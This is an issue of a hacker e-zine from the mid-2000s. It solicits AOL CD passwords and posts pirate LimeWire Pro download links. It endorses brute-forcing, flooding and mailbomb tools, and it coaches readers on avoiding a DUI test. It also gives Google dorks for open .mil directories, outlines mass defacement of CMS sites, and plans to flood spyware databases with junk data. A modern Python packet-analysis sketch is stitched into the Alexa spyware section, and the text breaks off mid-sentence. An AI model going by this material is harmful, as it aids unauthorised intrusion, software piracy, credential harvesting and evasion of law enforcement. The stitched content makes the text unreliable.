issue 04
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
in this issue: <|
department of corrections <|
limewire pro 4 all <|
reviews <|
getting out of duis <|
links <|
webcam directory update <|
alexa spyware+project info <|
google mining guide <|
antidote update <|
php-fusion exploit <|
robot files with access diver <|
bellsouth doc droppage <|
webcam update <|
spread lynn-cisco project <|
the realist's manifesto <|
mail.b0x <|
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|

=================
= corrections =
=================
current members:

sheepbyte [sheepbyte@gmail.com] aka: w0oleater in irc sometimes


zraith [zraith@gmail.com]
a3kton [a3kton@gmail.com]
smyle [wide.smyle@gmail.com]
billy hoyle [hoyle.billy@gmail.com]
lexdyisc [yaj.yake@gmail.com]
easyex [easyex@gmail.com]

we have a new irc channel. check it out at rizon.net|#tiz


you must be registered to use the channel. to register type:
/msg nickserv register password [email]

please welcome our new member easyex of dark-assassins.com!!!


special thanks to minion and cypress for all the hosting they have been giving us.
thanks to lexdyisc for the radio plug on his show le radio:
http://www.podcastindubator.com/leradio
episode three just got released so check it out!

looks like somebody blogged the nasa directory *happy dance*


http://thepheds.blogspot.com/

we still need your aol cd passwords. please send them to sheepbyte@gmail.com


you will be kept anonymous on request.
current contributors are:
matt
bracket
invision260
*special thanks to matt for his contributions*


do you have something to say? send it to sheepbyte@gmail.com


we still need articles, send them to sheepbyte@gmail.com
thanks to everybody who made issue 04 possible!
===============================
= limewire pro for all =
===============================
by anonymous

directory snooping on limewire, found the latest pro downloads for the following
operating systems: windows, mac osx, mac classic, linux (rpm), other (os/2,
solaris, linux).

of course you should buy a copy and not just download it without paying! this is
just to show you what you can get from snooping around a web directory.

filenames:

windows: limewirewin.exe
mac osx: limewireosx.dmg
mac classic (frozen at 4.0): limewiremac.bin
linux (rpm): limewirelinux.rpm
other (os/2, solaris, linux): limewireother.zip

mirrors:

http://sales.limewire.com/041225/fkzbpt8eru3r2jrmge1hr7adqr3bkzk3/
http://sales.limewire.com/041225/fkzbpt8eru3r2jrmge1hr7adqr3bkzk3/beta/

there is also: http://www9.limewire.com/download/ - just add on the filename.

isn't directory snooping fun? well, as we said you should buy a copy not just
download it! we are in no way responsible if you download a copy, whatever you do
is your responsibility.

===============
= reviews =
===============
access diver [accessdiver.com] 5/5
this is an awesome cracking tool. it has automated site scans, http brute forcing,
form bruting, word list editor, word list duplicate remover, proxy leecher, proxy
scanner, proxy analyzer, and many other awesome tools. i would highly recommend
this software for anybody looking for some good cracking software. it is free
software which is a big plus in my book.

advanced rar password recovery (arpr) [elcomsoft.com] 4/5
this is really good rar cracking software. it is shareware so it gets a minus one
but it gets the job done. it also recovers other archive passwords. so many rar
files are protected so this is software that you will find very handy.

mac makeup 1.7 [http://www.gorlani.com/publicprj/macmakeup/macmakeup.asp] 4/5
this is nice free software to change your mac address. it didn't pick up all the
cards i tested it on but it did pick up some. it automatically filters out virtual
addresses and can change it based on which company you want to make it look like
made it.
"1net corporation ;003070
2wire, inc ;000d72
2wire, inc. ;00d09e
360 systems ;000556
360sun digital broadband corporation ;000e60
"
the config file is absolutely huge because of all the mac addresses. this is
really nice software and it gets the job done.

foxit pdf reader [foxitsoftware.com] 5/5
this is a great stand-alone pdf reader for windows. it's free and it works. the
reason i got this was because i didn't want all the crap adobe throws on your
system so i found this one. it is nice scumware free software and will even set
itself as the default reader if you want it to.

stc 3.0 [kryptokrew.de] 4/5
this is a nice multi-hack tool. it has lots of neat features. i took one point off
because it doesn't feature proxy support.

features:
.httaccess brute forcer
anonymous ftp scanner
bios master passwords
cd player
cgi vuln. scanner
country codes (.de etc)
dictionary generator
dns and reverse dns lookup
domain scanner (portscanner)
file compare
ftp brute forcer
get server services
get cached passwords
hex/dec/bin/ascii converter
html grabber
irc brute forcer
irc flooder
link-looker
netbios password cracker
secure password generator
ping/traceroute
port2service [what services use which port]
portflooder
portscanner
local port checker
port watcher
screensaver cracker
simple mail (can use to mailbomb with anonymous mail servers)
oob nuker
telnet brute forcer
whois info

========================
= getting out of duis =
==by: sheepbyte=========

duis can be a tough battle to fight. if you are guilty and it didn't happen as an
accident do not use these techniques. you should go straight to jail. that being
said, the tests for drunk driving can be very inaccurate and as a result may get
you in for something you haven't done. if you get pulled over make sure you have
your papers and all your information in the glove compartment and you know where
they are. if you look like you know what you are doing then you will look less
drunk and you may avoid a test. the officer will probably ask if you have had
anything to drink. there are several paths you could take here. outright saying no
will raise a red flag because you probably weren't driving well in the first
place. you may choose to say you had some to drink with your friends, but you
thought you had less than the legal limit. remember: don't be defensive, be
courteous. you could say that you think you may have had too much to drink and
that you are tired. casually mention that you think it would be best if you didn't
drive anymore and the officer may offer you a ride home. you may even request a
safe ride, and most officers won't deny you a ride if you say you shouldn't be on
the road because it makes them liable. if he does then take this option!!!!! this
will get you home and off clean. don't be afraid to ride with the officer as this
won't hurt you. if he arrests you, you are in a whole other league and i won't
cover that. some people think drinking listerine will work and in some cases it
does. this only works in some states. in many states this will only get the
officer mad that you are trying to lie to him and he will do everything to get you
in trouble. at some point during the questioning he will ask you if you have any
weapons. if you have weapons tell him so. lying about this can land you some time
in jail.

remember these tips:
1. look organized
2. don't lie about weapons
3. don't be defensive
4. be courteous and respectful
5. if he offers, take the ride home.

many people get caught in the dui dragnet and hopefully this will help you. again,
if you are driving drunk and were being stupid or had it happen before then go to
jail and learn your lesson.

===============
= links =
===============
[reverse-engineering.net]
this site has some good resources and a cool forum.

[reteam.org]
this is a good reverse engineering site with some nice forums. it's l337 so go!

[pandora-security.com]
an awesome site i found out about through irc. this is true hacking none of this
cracking or botnet shit. run by my good friend 34109!

[bash.org]
funny stuff from irc. vote for your favorite.

[phrack.org]
phrack 63 is out so download it and read it.

[http://thedigitalremix.com/remixradio/]
a new hacker radio show that i've been watching. looks like it will be pretty
cool. i got interviewed so it should be uber-leet.

[shellcoders.com]
a site about programming and hacking by my friend sintigan. anybody who is
registered is uber-leet so check it out.

[http://www.2600.com/photos/]
was coley trying to start an image gallery?

===============
= webcam =
= directory =
===============
we are closing down the webcam directory. it looks as if nobody is contributing so
there is no reason to keep it up. we may re-launch it at a later time.

===============
= alexa =
= + =
= spyice =
===============
we are starting a new project at the antidote which will be a new approach to
spyware. instead of simply defending users against spyware this software will take
an offensive against the databases which track us. this software will take action
and not passively play a game of cat and mouse. my first project was investigating
the alexa toolbar software. what you are about to see is very scary. i was
genuinely scared by what i saw here. this is only 10% of what this software can
do. i have yet to analyze my firewall logs which will reveal more information
about what may be in the raw tcp packets.

this goes to what appears to be the page ranker. i'm not sure quite how it works
but here is part of the packet dump. any areas covered with xs may be private or
revealing information. if you can't tell i was using ie6 infected with alexa
toolbar 7.0. this has to be the first time i have deliberately installed such scum
on my machine.

request to: data.alexa.com


0000 00 09 5b 85 81 34 00 c0 fe 01 01 01 08 00 45 00 ..[..4........e.
0010 02 14 76 86 40 00 80 06 02 46 c0 a8 00 1c d1 ed ..v.@....f......
0020 ed 65 13 24 00 50 67 b0 a0 d6 a7 0c 9e 41 50 18 .e.$.pg......ap.
0030 42 30 87 ef 00 00 47 45 54 20 2f 64 61 74 61 2f b0....get /data/
0040 72 31 77 55 32 31 69 6c 57 57 78 32 57 7a 3f 63 r1wu21ilwwx2wz?c
0050 6c 69 3d 31 30 26 64 61 74 3d 73 6e 62 61 26 76 li=10&dat=snba&v
0060 65 72 3d 37 2e 30 26 63 64 74 3d 61 6c 78 5f 76 er=7.0&cdt=alx_v
0070 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0080 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0090 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxguid??xxxxx
00a0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
00b0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
00c0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
00d0 72 71 25 33 44 30 26 75 72 6c 3d 68 74 74 70 3a rq%3d0&url=http:
00e0 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 20 48 //www.msn.com/ h
00f0 54 54 50 2f 31 2e 31 0d 0a 41 63 63 65 70 74 3a ttp/1.1..accept:
0100 20 2a 2f 2a 0d 0a 41 63 63 65 70 74 2d 45 6e 63 */*..accept-enc
0110 6f 64 69 6e 67 3a 20 67 7a 69 70 2c 20 64 65 66 oding: gzip, def
0120 6c 61 74 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 late..user-agent
0130 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 : mozilla/4.0 (c
0140 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 ompatible; msie
0150 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 6.0; windows nt
0160 35 2e 31 3b 20 2e 4e 45 54 20 43 4c 52 20 31 2e 5.1; .net clr 1.
0170 31 2e 34 33 32 32 3b 20 41 6c 65 78 61 20 54 6f 1.4322; alexa to
0180 6f 6c 62 61 72 29 0d 0a 48 6f 73 74 3a 20 64 61 olbar)..host: da
0190 74 61 2e 61 6c 65 78 61 2e 63 6f 6d 0d 0a 43 6f ta.alexa.com..co
01a0 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 nnection: keep-a
01b0 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a 20 41 56 live..cookie: av
01c0 5f 63 63 4c 6f 61 64 3d 66 61 6c 73 65 3b 20 74 _ccload=false; t
01d0 77 79 6d 36 35 5f 64 69 73 61 62 6c 65 64 3d 66 wym65_disabled=f
01e0 61 6c 73 65 3b 20 74 77 79 6d 36 35 3d 44 31 41 alse; twym65=d1a
01f0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxguidxxxxxxxx
0200 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxguidxxxxx; al
0210 65 78 61 56 65 72 73 69 6f 6e 3d 37 2e 30 0d 0a exaversion=7.0..
0220 0d 0a ..

cookie data: (client.alexa.com)


0000 00 09 5b 85 81 34 00 c0 fe 01 01 01 08 00 45 00 ..[..4........e.
0010 01 97 77 2d 40 00 80 06 02 21 c0 a8 00 1c d1 ed ..w-@....!......
0020 ed 60 13 37 00 50 68 e2 51 aa e8 bf af cc 50 18 .`.7.ph.q.....p.
0030 42 30 ff 2c 00 00 47 45 54 20 2f 64 65 74 61 69 b0.,..get /detai
0040 6c 73 2f 69 6d 61 67 65 73 2f 73 74 61 72 73 2d ls/images/stars-
0050 34 2d 35 2e 67 69 66 20 48 54 54 50 2f 31 2e 31 4-5.gif http/1.1
0060 0d 0a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 41 ..accept: */*..a
0070 63 63 65 70 74 2d 4c 61 6e 67 75 61 67 65 3a 20 ccept-language:
0080 65 6e 2d 75 73 0d 0a 41 63 63 65 70 74 2d 45 6e en-us..accept-en
0090 63 6f 64 69 6e 67 3a 20 67 7a 69 70 2c 20 64 65 coding: gzip, de
00a0 66 6c 61 74 65 0d 0a 55 73 65 72 2d 41 67 65 6e flate..user-agen
00b0 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 t: mozilla/4.0 (
00c0 63 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 compatible; msie
00d0 20 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 6.0; windows nt
00e0 20 35 2e 31 3b 20 2e 4e 45 54 20 43 4c 52 20 31 5.1; .net clr 1
00f0 2e 31 2e 34 33 32 32 3b 20 41 6c 65 78 61 20 54 .1.4322; alexa t
0100 6f 6f 6c 62 61 72 29 0d 0a 48 6f 73 74 3a 20 63 oolbar)..host: c
0110 6c 69 65 6e 74 2e 61 6c 65 78 61 2e 63 6f 6d 0d lient.alexa.com.
0120 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 .connection: kee
0130 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a p-alive..cookie:
0140 20 41 56 5f 63 63 4c 6f 61 64 3d 66 61 6c 73 65 av_ccload=false
0150 3b 20 74 77 79 6d 36 35 5f 64 69 73 61 62 6c 65 ; twym65_disable
0160 64 3d 66 61 6c 73 65 3b 20 74 77 79 6d 36 35 3d d=false; xxxxxxx
0170 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxguidxxxxxx
0180 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0190 20 41 6c 65 78 61 56 65 72 73 69 6f 6e 3d 37 2e alexaversion=7.
01a0 30 0d 0a 0d 0a 0....

another cookie:
0000 00 09 5b 85 81 34 00 c0 fe 01 01 01 08 00 45 00 ..[..4........e.
0010 01 d9 76 96 40 00 80 06 f3 ef c0 a8 00 1c 41 36 ..v.@.........a6
0020 8c 9e 13 28 00 50 67 b1 8d 9d 53 be 41 e8 50 18 ...(.pg...s.a.p.
0030 42 30 0d 09 00 00 47 45 54 20 2f 63 2e 67 69 66 b0....get /c.gif
0040 3f 6e 61 3d 31 31 35 34 26 6e 63 3d 31 30 30 30 ?na=1154&nc=1000
0050 39 26 64 69 3d 33 34 30 26 70 69 3d 37 33 31 37 xxxxxxxxxxxxxxxx
0060 26 50 53 3d 38 33 39 36 37 26 54 50 3d 68 74 74 xxxxxguidxxxxxxx
0070 70 25 33 61 25 32 66 25 32 66 77 77 77 2e 6d 73 xxxxxxxxxxxxxxxx
0080 6e 2e 63 6f 6d 25 32 66 64 65 66 61 75 6c 74 2e n.com%2fdefault.
0090 61 72 6d 78 20 48 54 54 50 2f 31 2e 31 0d 0a 41 armx http/1.1..a
00a0 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 52 65 66 65 ccept: */*..refe
00b0 72 65 72 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e rer: http://www.
00c0 6d 73 6e 2e 63 6f 6d 2f 0d 0a 41 63 63 65 70 74 msn.com/..accept
00d0 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 2d 75 73 -language: en-us
00e0 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e ..accept-encodin
00f0 67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 g: gzip, deflate
0100 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f ..user-agent: mo
0110 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 zilla/4.0 (compa
0120 74 69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b tible; msie 6.0;
0130 20 57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b windows nt 5.1;
0140 20 2e 4e 45 54 20 43 4c 52 20 31 2e 31 2e 34 33 .net clr 1.1.43
0150 32 32 3b 20 41 6c 65 78 61 20 54 6f 6f 6c 62 61 22; alexa toolba
0160 72 29 0d 0a 48 6f 73 74 3a 20 63 2e 6d 73 6e 2e r)..host: c.msn.
0170 63 6f 6d 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a com..connection:
0180 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f keep-alive..coo
0190 6b 69 65 3a 20 43 55 4c 54 55 52 45 3d 65 6e 2d kie: culture=en-
01a0 55 53 3b 20 6d 68 3d 4d 53 46 54 3b 20 4d 43 31 us; mh=msft; mc1
01b0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx =v=2&guid=xxxxxx
01c0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxguidxxxxxxxxxx
01d0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxx; spee
01e0 44 3d 42 0d 0a 0d 0a d=b....

url request:
0000 00 09 5b 85 81 34 00 c0 fe 01 01 01 08 00 45 00 ..[..4........e.
0010 01 d9 76 96 40 00 80 06 f3 ef c0 a8 00 1c 41 36 ..v.@.........a6
0020 8c 9e 13 28 00 50 67 b1 8d 9d 53 be 41 e8 50 18 ...(.pg...s.a.p.
0030 42 30 0d 09 00 00 47 45 54 20 2f 63 2e 67 69 66 b0....get /c.gif
0040 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0050 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0060 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0070 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0080 6e 2e 63 6f 6d 25 32 66 64 65 66 61 75 6c 74 2e n.com%2fdefault.
0090 61 72 6d 78 20 48 54 54 50 2f 31 2e 31 0d 0a 41 armx http/1.1..a
00a0 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 52 65 66 65 ccept: */*..refe
00b0 72 65 72 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e rer: http://www.
00c0 6d 73 6e 2e 63 6f 6d 2f 0d 0a 41 63 63 65 70 74 msn.com/..accept
00d0 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 2d 75 73 -language: en-us
00e0 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e ..accept-encodin
00f0 67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 g: gzip, deflate
0100 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f ..user-agent: mo
0110 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 zilla/4.0 (compa
0120 74 69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b tible; msie 6.0;
0130 20 57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b windows nt 5.1;
0140 20 2e 4e 45 54 20 43 4c 52 20 31 2e 31 2e 34 33 .net clr 1.1.43
0150 32 32 3b 20 41 6c 65 78 61 20 54 6f 6f 6c 62 61 22; alexa toolba
0160 72 29 0d 0a 48 6f 73 74 3a 20 63 2e 6d 73 6e 2e r)..host: c.msn.
0170 63 6f 6d 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a com..connection:
0180 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f keep-alive..coo
0190 6b 69 65 3a 20 43 55 4c 54 55 52 45 3d 65 6e 2d kie: culture=en-
01a0 55 53 3b 20 6d 68 3d 4d 53 46 54 3b 20 4d 43 31 us; mh=msft; mc1
01b0 3d 56 3d 32 26 47 55 49 44 3d 62 61 66 30 34 63 =v=2&guid=x
01c0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
01d0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
01e0 44 3d 42 0d 0a 0d 0a d=b....

here are the changes it made to my system during the install. again xxxxxs
indicate bleeped out information. i tracked this information with total-uninstall
3.0, which is really great software. i'm not including things like temp files and
modifications to system logs in this. a clsid is the equivalent of a guid.

it added c:\program files\alexa toolbar\uninstall.exe
it added c:\windows\system32\alxres.dll which is a bho.
it added c:\windows\system32\alxtb1.dll which is a bho.
it added hkey_classes_root\alxtb.bho.1
it added hkey_classes_root\alxtb.bho.1\clsid
it added hkey_classes_root\alxtb.bho.1\clsid\(default) which contains the clsid
it added hkey_classes_root\alxtb.bho.1\(default)
it added hkey_classes_root\alxtb.bho
it added hkey_classes_root\alxtb.bho\clsid
it added hkey_classes_root\alxtb.bho\clsid\(default) which contains a clsid
it added hkey_classes_root\alxtb.bho\curver
it added hkey_classes_root\alxtb.bho\curver\(default)
it added hkey_classes_root\alxtb.bho\(default)
it added 6 clsids to hkey_classes_root\clsid
from this point on i won't include clsids because it would take pages and pages to
document them all. this only leaves one to wonder why they need so many different
ones...
it added a bunch of settings and menus with their own clsids to the registry
it modified hkey_current_user\software\microsoft\internet explorer\extensions\cmdmapping\nextid
it added 5 items to hkey_current_user\software\microsoft\internet explorer\menuext
it changed hkey_current_user\software\microsoft\internet explorer\toolbar\webbrowser\itbarlayout
it added a ton of preferences under hkey_current_user\software\microsoft\office\11.0\common\research\sources
it added preferences under hkey_local_machine\software\alexa internet
it added hkey_local_machine\software\alexa toolbar
it added hkey_local_machine\software\microsoft\windows\currentversion\uninstall\alexa toolbar

that is only a short preview of the things that it added. i didn't include a lot
of clsid related things because there are too many and i left out some empty keys
or just included key folders. i will be releasing a removal tool for the tool bar
soon so expect to see that. it will probably be a dos batch file.
a full list of system changes can be found here:
http://securityresponse.symantec.com/avcenter/venc/data/spyware.alexa.html

it looks like they use web bugs to track users and things like
.gif?guid=xxxxx&requestip=xxxx and it goes on like that. i was unable to decode
the tcp packets. it detected my brand of computer and told alexa what it was. this
software is very scary and bonzi/gator can only be worse. a lesson here can be
learned that you need to be careful with what you download, run, and let slip
through your network.
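
the sketch below is an added example, not part of the original article or of the antidote's own tools: it takes http requests like the ones in the dumps above and lists what each one reports about the user (visited url, toolbar user-agent, identifier cookies). the two sample requests are constructed from the visible parts of the dumps with placeholder values where the dumps are x'd out; the function names and the two-label "same site" rule are assumptions.

```python
"""Added example: list what a captured HTTP request reports about the user."""
import re
from urllib.parse import parse_qsl, urlsplit

UA = (b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; "
      b".NET CLR 1.1.4322; Alexa Toolbar)\r\n")

# Constructed samples modelled on the dumps; redacted parts are placeholders.
ALEXA_REQ = (
    b"GET /data/r1wU21ilWWx2Wz?cli=10&dat=snba&ver=7.0&cdt=alx_vPLACEHOLDER"
    b"rq%3D0&url=http://www.msn.com/ HTTP/1.1\r\n"
    b"Accept: */*\r\n" + UA +
    b"Host: data.alexa.com\r\n"
    b"Cookie: AV_ccLoad=false; twym65_disabled=false; "
    b"twym65=D1A00000000000000000000000000000; AlexaVersion=7.0\r\n\r\n"
)
MSN_REQ = (
    b"GET /c.gif?na=1154&nc=1000"
    b"&TP=http%3a%2f%2fwww.msn.com%2fdefault.armx HTTP/1.1\r\n"
    b"Referer: http://www.msn.com/\r\n" + UA +
    b"Host: c.msn.com\r\n"
    b"Cookie: CULTURE=en-US; mh=MSFT; "
    b"MC1=V=2&GUID=00000000000000000000000000000000\r\n\r\n"
)

# A cookie looks like a persistent identifier if it mentions "guid" or
# carries a run of 16 or more hex/dash characters (heuristic, assumption).
ID_LIKE = re.compile(r"guid|[0-9a-f-]{16,}", re.I)


def parse_request(raw):
    """Split a raw request into method, target and a lower-cased header dict."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def site(host):
    """Naive same-site key: the last two DNS labels (no public suffix list)."""
    return ".".join(host.lower().split(".")[-2:])


def analyze(raw):
    """Return the host contacted and the user data the request hands to it."""
    _method, target, headers = parse_request(raw)
    host = headers.get("host", "")
    _path, _, query = target.partition("?")

    reports = []  # query parameters whose value is itself a url
    for key, value in parse_qsl(query, keep_blank_values=True):
        if value.lower().startswith(("http://", "https://")):
            seen = urlsplit(value).hostname or ""
            scope = "same-site" if site(seen) == site(host) else "third-party"
            reports.append((key, value, scope))

    id_cookies = []  # names of cookies that look like tracking identifiers
    for part in headers.get("cookie", "").split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and (ID_LIKE.search(name) or ID_LIKE.search(value)):
            id_cookies.append(name)

    return {
        "host": host,
        "toolbar_ua": "alexa toolbar" in headers.get("user-agent", "").lower(),
        "reports": reports,
        "id_cookies": id_cookies,
    }


if __name__ == "__main__":
    for sample in (ALEXA_REQ, MSN_REQ):
        print(analyze(sample))
```

run over the two samples, the request to data.alexa.com comes out as a third-party report of the page being visited, while the c.msn.com request is a same-site web bug that only carries the toolbar's user-agent string.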

anybody who knows anything about spyware or can code and would be willing to
participate please contact us. we need inside sources to tell us what all this
means!! basically we will be using their techniques against them. we will spam the
spyware databases with either random data, data with a message, or
realistic-looking bullshit. we haven't decided quite how this project will end up,
so we are still planning. the ~blindnet~ project will be on hold until we get this
off to a good start. we might start a sourceforge project for this. it will
probably be in c or a c variant and will run on win32/*nix systems. the
information we find out will all be available online on a website containing
information about these *evil* companies in a somewhat open format (almost a
wiki). again, if you would like to help please drop an email to:
sheepbyte@gmail.com

currently the developers are all the people in the antidote.

================
= the =
= google =
= mining =
= guide =
= by: =
= sheepbyte =
= i'm @ gmail! =
================
what is google mining
commands
exploitation
resources
problems with it
corporate responsibility
conclusion

what is google mining
----------------------
google mining is the art of exploiting google features to find information. google
indexes thousands of pages on the web and many of them were not meant to be
indexed. a large part of hacking is finding information and that is exactly what
google mining does. this article will go into detail and give examples of google
mining. this is a skill you will use not only in hacking but every time you search
for something.

commands
---------
""
intitle:
inurl:
intext:
insite:
cache:
link:
related:
info:
definition:
stocks:
filetype:
movie:
fcc
patent

""
quotes can help you specify blocks of text. let's say i'm ego-googling on my zine.
i would type "the intrahack zine" and get results only pertaining to it. if i
typed in the intrahack zine i would get pages containing these combinations of
words:
the
intrahack
zine
the intrahack
the zine
intrahack zine
that isn't very efficient is it? let's say i'm looking for manuals for the glass
front vendor by dixie-narco. i could use this query:
"dixie-narco" "glass front" "manual"
if you go under advanced mode you can make sure all those terms are in the page.

intitle:
the intitle command ensures that something is in the title. let's say you are
looking for a copy of freedom downtime. you could type:
intitle:"index of /" "freedom" "downtime" ".avi"
this is a fairly insufficient search but we will get into more complicated
commands.
the key part to the above search is the intitle:"index of /" this makes sure the
file is in an open ftp directory. some sites will spoof this, but generally you
will get good results. if you want to look for a page with information about
hacking and phreaking use allintitle:hacking phreaking.

inurl:
the inurl: function allows you to specify part of the url. let's say you are
looking for "hitch" torrents. you could find blog torrent servers using this
query:
inurl:/bt "hitch" "torrent"
you may not wish to add "torrent" because it will give you more hits. let's say
you want to find open directories on .mil sites. just use:
inurl:".mil" intitle:"index of /"
allinurl: can use multiple words.

intext:
the intext: function is pretty useless. you can already just type it in the search
box or use quotes to achieve the same results. if you type "free porn" in google
you will get sites that may only contain that in the title or meta tags, intext:
ensures it is in the text.

insite:
the insite command can be used to search a certain site. now this is fairly
useless because you already have the same command as insite: called inurl:. let's
say you are searching binrev forums for a post about catsex. you could use this
query:
insite:binrev.com "catsex"
you could also use the inurl: function to achieve the same results. inurl: will
turn up hits from archive.org and other mirrors so insite: does a little better at
this. site: will also achieve the same effect.

cache:
you can use the cache: command to find google's cache of a site. at one point
tiz.brokenfloppy.com had no bandwidth left so you could have used
cache:tiz.brokenfloppy.com to see it. many pdf files and other files are available
only through cache and other archive services. i believe you can send a request to
google to remove your site but i think you have to find the email.

link:
this query will return all pages that link to a certain page. let's say i'm
looking for pages that link to tiz.brokenfloppy.com i could use
link:tiz.brokenfloppy.com
this query gets no results and doesn't include links within our site like
tiz.brokenfloppy.com/directory.txt. i could use "tiz.brokenfloppy.com" and return
much more results.

related:
this query returns pages that are related to other pages. related:bellsmind.net
turns up several good results.

info:
this returns info about a certain page or site. info:binrev.com returns some of
the news from the site. this can also be achieved by typing in the url directly.

definition:
this will give you the definition of a word. pretty self-explanatory. you can also
use define:.

stocks:
this will return stock information. if you want to see multiple stocks such as
microsoft and aol type stocks:msft aol

filetype:
the filetype: function will only return files of a certain type. let's say you are
looking for manuals in the pdf format. type filetype:pdf manual.

movie:
use the movie: function to find information out about a movie.

fcc
use "fcc fccid" to find fcc information on a specific device.
patent
use "patent patentnum" to find patent information.

you can also do math queries. type 5+2 and google will tell you the answer is 7.

you can also do currency conversions in this format: 3.5 usd in gbp

to get phone book information type a number in this format:


xxx-xxx-xxxx
or type the personal information in this format:
first name (or first initial), last name, city (state is optional)
first name (or first initial), last name, state
first name (or first initial), last name, area code
first name (or first initial), last name, zip code
phone number, including area code
last name, city, state
last name, zip code

to get a map of an area type the address like:


165 university ave palo alto ca

to get flight information type the info in this format:


airline flight_number
airport flight_number

to get weather type:


weather city, state

exploitation
------------
many exploits for web applications come out every day. google enables skiddies to
do mass site defacements. let's say there is an exploit for php-nuke. what you can
do is go in to google and type something all the pages run by that system have in
common. most cmss have a little "created by" thing at the bottom or something
similar so it is easy to identify sites. once you have searched you just rip all
the urls and run them through a perl script to make the exploit urls. exploitation
and defacement is suddenly a breeze. it really takes no skill to deface websites
with cms exploits and that is why so many people do it. they do it to impress
their friends, to feel good about themselves, or to please their ego. if you are
doing mass defacements you don't deserve to be part of the internet.

resources
---------
there are many places with information on google mining/hacking. for specific
queries check out johnny.ihackstuff.com
for google mining questions contact me or go to binrev.com/forums to the google
mining section. there is a lot more to be learned in this area. i haven't included
specific queries because it would take thousands of pages and would just be
worthless filler. there are some books out there on google mining and most forums
will have members willing to help. google is always coming out with new stuff so
check out labs.google.com

this paper doesn't include all the google features, only ones you can use through
the search box.

problems with it
----------------
the only problems with google mining that restrain you from everything are
robots.txt files and linking. google obeys robots.txt files which could seriously
